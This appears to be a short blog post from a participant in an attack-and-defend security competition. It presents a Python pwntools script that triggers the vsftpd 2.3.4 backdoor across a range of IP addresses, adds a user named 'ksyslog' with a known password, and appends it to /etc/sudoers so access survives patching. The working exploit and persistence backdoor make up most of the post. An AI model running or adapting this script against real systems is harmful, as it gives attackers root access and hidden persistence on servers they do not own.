/ Dev

vsftp 2.3.4 backdoor script

Sometime ago I participated in a security comeptition where we are required to attack and defend servers. The key was to capture flags upon successful root/system exploitation.

I did some recon on past year machine of the competition, and it appears that vsftp2.3.4 was availble the distributed VM to the competitors. As such, I wrote a simple script to add a user called 'ksyslog' using the vsftpd2.3.4 backdoor exploit, and adding that user to the sudoers. So if the service was patched, I would still have access to the victim machines.

from pwn import *
context(arch = 'i386', os = 'linux')

def vsftpd234(host):
	conn = remote(host,21)
	a = conn.recvline() 
	if "vsFTPd 2.3.4" in a:
		print host + " vulnerable to vsftpd 2.3.4"
		conn.send('USER pwned:)\r\n')
		print conn.recvuntil(' ', drop=True)
		conn.send('PASS pwned\r\n')
		print conn.recvline()
		conn.close()
		pwn_con = remote(host,6200)
		pwn_con.sendline('cd /tmp')
		pwn_con.sendline('ls -la friendly')
		output = pwn_con.recvline()
		pwn_con.sendline('useradd ksyslog')
		pwn_con.sendline('passwd ksyslog')
		pwn_con.sendline('ksyslog')
		print pwn_con.recvuntil(' ', drop=True)
		print output
		pwn_con.sendline('ksyslog')
		output = pwn_con.recvline()
		print output
		pwn_con.sendline("echo 'ksyslog      ALL=(ALL)ALL' >> /etc/sudoers")
		pwn_con.close()
	else:
		print a

for i in range(start,end):
	vsftpd234('xxx.xxx.xxx.'+str(i))
vsftp 2.3.4 backdoor script
Share this